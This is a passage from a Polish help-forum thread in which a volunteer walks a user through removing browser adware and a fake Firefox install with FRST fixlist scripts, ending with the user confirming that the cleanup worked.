2017-04-25 14:39 - 2017-04-25 14:39 - 00000000 ____D C:\Program Files (x86)\Firefox
2017-04-25 14:35 - 2017-04-25 14:35 - 00000000 _____ C:\WINDOWS\SysWOW64\1
2017-04-24 13:32 - 2017-04-24 13:32 - 00003546 _____ C:\WINDOWS\System32\Tasks\T0528
2017-04-20 08:46 - 2017-04-27 16:07 - 00000000 _____ C:\WINDOWS\SysWOW64\22
2017-04-20 08:46 - 2017-04-27 16:07 - 00000000 _____ C:\WINDOWS\SysWOW64\11
2017-04-20 08:41 - 2017-04-21 13:13 - 00000000 ____D C:\Program Files (x86)\MK
2017-04-19 12:25 - 2017-04-27 08:36 - 00000000 ____D C:\Users\filip\AppData\Local\3DM
2017-04-17 17:13 - 2016-05-23 04:41 - 00055056 _____ (Elex do Brasil Participações Ltda) C:\WINDOWS\system32\Drivers\iSafeKrnlBoot.sys
2017-04-17 17:13 - 2016-05-19 08:42 - 00052392 _____ (Elex do Brasil Participações Ltda) C:\WINDOWS\system32\Drivers\iSafeNetFilter.sys
2017-04-17 17:12 - 2017-04-27 17:13 - 00000000 ____D C:\Users\filip\AppData\LocalLow\Mozilla
2017-04-17 17:12 - 2017-04-27 16:07 - 00002080 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2017-04-17 17:12 - 2017-04-17 17:12 - 00000000 ____D C:\Users\filip\AppData\Roaming\Firefox
2017-04-17 17:12 - 2017-04-17 17:12 - 00000000 ____D C:\Users\filip\AppData\Local\Firefox
2017-04-17 17:11 - 2017-04-17 17:11 - 00000000 ____D C:\Users\filip\AppData\Local\Eastness
2017-04-17 17:11 - 2017-04-17 17:11 - 00000000 ____D C:\ProgramData\Software
2017-04-17 17:11 - 2017-04-17 17:11 - 00000000 ____D C:\Program Files (x86)\Eastness
2017-04-17 17:10 - 2017-04-27 16:07 - 00000000 ____D C:\Users\filip\AppData\Local\SNARE
2017-04-17 17:10 - 2017-04-27 16:07 - 00000000 ____D C:\Users\filip\AppData\Local\Kitty
2017-04-17 17:10 - 2017-04-27 16:07 - 00000000 _____ C:\Users\Public\Documents\temp.dat
2017-04-17 17:10 - 2017-04-25 14:36 - 00003680 _____ C:\WINDOWS\System32\Tasks\Milimili
2017-04-17 17:10 - 2017-04-25 14:35 - 00000000 ____D C:\Users\filip\AppData\Roaming\WinSAPSvc
2017-04-17 17:10 - 2017-04-17 17:10 - 00000000 ____D C:\Program Files (x86)\MIO
2017-04-17 17:05 - 2017-04-27 14:18 - 00000000 ____D C:\Program Files (x86)\BiaoJi
2017-04-13 14:35 - 2017-04-13 14:36 - 00003688 _____ C:\WINDOWS\System32\Tasks\Windows-WoShiBeiYongDe
2017-04-13 14:34 - 2017-04-13 14:34 - 00000000 ____D C:\Users\filip\AppData\Roaming\SSMgre
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
C:\Users\filip\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk
C:\Users\Public\Desktop\Mozilla Firefox.lnk
EmptyTemp:

Plik zapisz pod nazwą fixlist.txt i umieść obok FRST.exe
Uruchom FRST i kliknij przycisk Fix (NAPRAW).

Powstanie plik fixlog.txt.
Daj ten log.

2) Zrób nowe logi FRST.

Edytowane 27 kwietnia 2017 przez Twój_Anioł_Stróż

27 kwietnia 2017

Chyba znalazłem błąd . Haha . Zamiast Naprawić klikałem znowu skanuj. Przepraszam za kłopot. Już daję.

http://www14.zippyshare.com/v/Xi74D8my/file.html

27 kwietnia 2017

Otwórz Notatnik i wklej w nim:

Cytuj

FirewallRules: [{901192E8-4251-4C0A-9EF7-D4181924419D}] => (Allow) C:\Program Files (x86)\Eastness\Application\chrome.exe

FirewallRules: [{6C561370-B243-4B35-8F0C-3AAD52C509E8}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
FirewallRules: [{E772D82B-626D-4230-BACA-9C3CE1995C79}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe
FirewallRules: [{8078E3B1-C130-4446-B48C-F06317D84983}] => (Allow) C:\Program Files (x86)\MIO\loader\st1000dx001-sshd-8gb_z4yd2hpfxxxxz4yd2hpf.dat
FirewallRules: [{9E15D2BA-7030-4920-8B11-294F8C54C473}] => (Allow) C:\Program Files (x86)\MIO\loader\st1000dx001-sshd-8gb_z4yd2hpfxxxxz4yd2hpf.dat
EmptyTemp:

Plik zapisz pod nazwą fixlist.txt i umieść obok FRST.exe
Uruchom FRST i kliknij przycisk Fix (NAPRAW).

Jeśli będzie OK, to będziemy kończyć:
Otwórz Notatnik i wklej w nim:

Cytuj

DeleteQuarantine:

Plik zapisz pod nazwą fixlist.txt i umieść obok FRST. Uruchom FRST i kliknij w Fix (NAPRAW).
przez SHIFT+DEL usuń pozostały folder C:\FRST.

Edytowane 27 kwietnia 2017 przez Twój_Anioł_Stróż

28 kwietnia 2017

Okej zrobione tak jak powiedziałeś.

Wycinek z Fixloga:

"C:\FRST\Quarantine" => pomyślnie usunięto.

Ogólnie zauważyłem , że nie włączają mi się te nowe karty. Mozzila Firefox też się odinstalowała ( Sama sie zainstalowała ) . Wszystko jest narazie git.

Bardzo dziękuje za cierpliwość i wielką pomoc. Jestem bardzo wdzięczny.

Zaloguj się

Wirusy przeglądarkowe

Pulsik

Twój_Anioł_Stróż

Pulsik

Twój_Anioł_Stróż

Pulsik

Twój_Anioł_Stróż

Pulsik

Twój_Anioł_Stróż

Pulsik

Twój_Anioł_Stróż

Pulsik

Twój_Anioł_Stróż

Pulsik

Twój_Anioł_Stróż

Pulsik

Wciąż szukasz rozwiązania problemu? Napisz teraz na forum!

Strona główna

Powiadomienie o plikach cookie